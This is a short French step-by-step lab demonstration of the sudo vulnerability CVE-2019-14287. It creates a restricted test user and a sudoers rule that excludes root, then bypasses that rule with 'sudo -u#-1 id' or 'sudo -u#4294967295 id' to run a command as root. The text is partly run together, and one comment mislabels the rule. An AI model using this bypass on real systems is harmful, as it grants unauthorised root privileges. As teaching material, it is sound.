
Démonstration étape par étape de la vulnérabilité sudo CVE-2019-14287 permettant à des utilisateurs restreints d'exécuter des commandes en tant que root via des identifiants utilisateur spécialement conçus.
4294967295 Un bug dans Sudo permet aux utilisateurs restreints d'exécuter des commandes en tant que root
sudo su - root useradd -m -s /bin/bash testuser passwd testuser // ajouter un mot de passe à l'utilisateur visudo
test ALL=(ALL, !root) /usr/bin/id // spécifie que cet utilisateur ne peut pas utiliser la commande id avec l'utilisateur root
ENREGISTREZ LE FICHIER ET QUITTEZ L'UTILISATEUR ROOT
sudo su - test
sudo id VOUS RECEVREZ LE MESSAGE Désolé, l'utilisateur test n'est pas autorisé à exécuter '/usr/bin/id' en tant que root
sudo -u#-1 id OU sudo -u#4294967295 id
Et voilà, vous avez exécuté la commande id en utilisant root